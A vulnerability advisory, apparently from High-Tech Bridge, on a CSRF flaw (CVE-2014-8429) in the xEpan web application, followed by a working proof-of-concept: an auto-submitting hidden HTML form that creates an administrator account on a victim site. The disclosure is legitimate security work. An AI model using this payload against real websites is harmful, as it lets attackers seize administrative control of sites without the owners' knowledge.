Сross-Site Request Forgery (CSRF) in xEpan

High-Tech Bridge Security Research Lab discovered vulnerability in xEpan, which can be exploited to compromise vulnerable web site.

1. Сross-Site Request Forgery (CSRF) in xEpan: CVE-2014-8429

The vulnerability exists due to insufficient validation of the HTTP request origin when creating new user accounts. A remote unauthenticated attacker can trick a logged-in administrator to visit a malicious page with CSRF exploit, create new account with administrative privileges and get total control over the vulnerable website.

A simple CSRF exploit below creates an administrative account with username “immuniweb” and password “password”:

<form action=“http://[host]/?page=owner/users&web_owner_users_crud_virtualpage=add &submit=web_web_owner_users_crud_virtualpage_form” method=“post” name=“main”>
<input type=“hidden” name=“web_web_owner_users_crud_virtualpage_form_name” value=“name”>
<input type=“hidden” name=“web_web_owner_users_crud_virtualpage_form_email” value="[email protected]">
<input type=“hidden” name=“web_web_owner_users_crud_virtualpage_form_username” value=“immuniweb”>
<input type=“hidden” name=“web_web_owner_users_crud_virtualpage_form_password” value=“password”>
<input type=“hidden” name=“web_web_owner_users_crud_virtualpage_form_created_at” value=“21/10/2014”>
<input type=“hidden” name=“web_web_owner_users_crud_virtualpage_form_type” value=“100”>
<input type=“hidden” name=“web_web_owner_users_crud_virtualpage_form_is_active” value=“1”>
<input type=“hidden” name=“web_web_owner_users_crud_virtualpage_form_activation_code” value=“”>
<input type=“hidden” name=“web_web_owner_users_crud_virtualpage_form_last_login_date” value=“”>
<input type=“hidden” name=“ajax_submit” value=“form_submit”>
<input type=“submit” id=“btn”>
</form>

<script>
document.main.submit();
</script>